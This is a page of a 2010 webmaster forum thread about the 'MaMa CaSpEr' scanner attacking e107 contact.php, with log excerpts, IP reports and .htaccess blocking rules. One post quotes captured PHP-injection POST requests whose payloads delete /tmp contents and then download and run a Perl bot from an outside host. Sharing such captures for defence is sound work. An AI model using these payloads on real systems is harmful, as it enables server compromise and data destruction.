homepage Welcome to WebmasterWorld Guest from 54.163.91.250
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 41 message thread spans 2 pages: < < 41 ( 1 [2]     
casper bot search attempts to infect sites
user agent changing almost daily
dstiles




msg:4160993
 10:47 pm on Jun 28, 2010 (gmt 0)

Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seems to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?

 

dstiles




msg:4167452
 10:33 pm on Jul 9, 2010 (gmt 0)

Not really feasible to post here, Bill. 260 lines, some of which are very long (total over 30 Kbytes), much of it BASE64 and a lot of tightly-packed URLs. It'd be a nightmare to disentangle. I'm willing to email it to known members if they sticky me, though.

Megaclinium




msg:4168070
 1:39 pm on Jul 11, 2010 (gmt 0)

I don't have .PHP in use.

My log processing program separates unknown bots from known bots who I haven't banned (such as google, yahoo, picsearch, etc)

and from legitimate traffic based on characteristics.

From this I found several recent .PHP hack attacks from all over.

Inspired by various posters I've since created the directories the hack attacks tried to find (various creative variations on php progs and others)

then took large meaningless files and renamed them main.php.

While I've banned the original ranges they came from,
if they repeat from another server, they'll get a mouthful of fur to choke on.

to quote a current movie,
off with their heads, screamed the red queen!

caribguy




msg:4168148
 7:48 pm on Jul 11, 2010 (gmt 0)

Why waste your bandwidth on those idiots? Simply 301 redirect to 127.0.0.1

dstiles




msg:4168174
 8:55 pm on Jul 11, 2010 (gmt 0)

I return a 403 for any page request that includes the extension (amongst others) .php. There is no way I would give them the folders/files they ask for: I would be creating them at the rate of dozens per day! And to no purpose except to encourage them.

I doubt they actually read the files anyway: they are just POSTing to them. Anyone noticed if they abort the read (206, was it?)? I haven't really checked the site logs, only the security logs which don't record that.

Pfui




msg:4172330
 7:27 am on Jul 18, 2010 (gmt 0)

Finally saw one of the variations on a no-php server. Undeterred by 403s: 8 hits in 2 secs. Alternated attempted POSTs to one specific HTML page (but it removed the suffix & appended a nonexistent dir: /e107) with hits to the also nonexistent: /e107

ns*.eforienett.ro
kmccrew Bot Search

robots.txt? NO

FWIW: The only servers that make a beeline only to the same specific page are Tor.

v1rich




msg:4172838
 3:14 pm on Jul 19, 2010 (gmt 0)

I've been seeing this today as well

Here are some of the posts - url decoded

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 468
Content-Type: text/xml
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo'casper';echo`cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp`;echo'kae';exit;/*</name></value></param></params></methodCall>

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 1241
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]passthru('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');system('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');shell_exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');;die();[/php]

Wizcrafts




msg:4181617
 5:35 am on Aug 4, 2010 (gmt 0)

I am seeing lots of MaMa CaSpEr user agent attacks, ongoing for over two weeks now. Fortunately, I block POST attempts that they are trying to exploit. Ex:

POST /blogs//contact.php HTTP/1.1" 403 512 "-" "MaMa CaSpEr"

Apparently, the bot can't tell that I use Perl, not PHP for my blog.

Wizcrafts




msg:4181833
 2:56 pm on Aug 4, 2010 (gmt 0)

These attacks are associated with Indonesian hackers using the e107 ByroeNet scanner. The Casper user agents are hard coded into the "ByroeNet" scanner dated from June 17, 2010.

I found much of this information on multiple searches, but it is best detailed here: [doc.emergingthreats.net...] - as captured in their honeypots and logs.

Bill; I hope that link is acceptable. It is an authority site.

Web_Savvy




msg:4202371
 7:32 pm on Sep 15, 2010 (gmt 0)

Well, it still continues:

We maintain our own internal security (as well as access) logs (so that no one could easily exploit the standard ones).

In the last few hours, we've recorded dozens of hits from:

IP UA
77.79.246.81 Casper Bot Search

HTH

Wizcrafts




msg:4202398
 8:05 pm on Sep 15, 2010 (gmt 0)

The Casper bot has just changed its name today, to CyBer.

91.213.117.193 - - [15/Sep/2010:05:36:08 -0600] "POST //contact.php HTTP/1.1" 403 550 "-" "MaMa CyBer"

The attacking IP is a an unconfigured server owned by a web hosting company in the Ukraine.

My .htaccess solution, from the get-go, has been:

RewriteCond %{HTTP_USER_AGENT} ^MaMa\ .+$ [NC]
RewriteRule .* - [F]

Allow the path to your custom 403 document, if any, in the RewriteRule, as a replacement for .*

Example:

RewriteRule !^(403\.(s?html|php)$ - [F]

Jonesy




msg:4206979
 11:30 pm on Sep 25, 2010 (gmt 0)

I've seen nothing of this for the last 10 days.
Then, today:

80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/b3016_preamp.html/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:10 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/b3016_preamp.html%20%20/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"


The "nnn' were all the same: CXC

Jonesy

This 41 message thread spans 2 pages: < < 41 ( 1 [2]
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved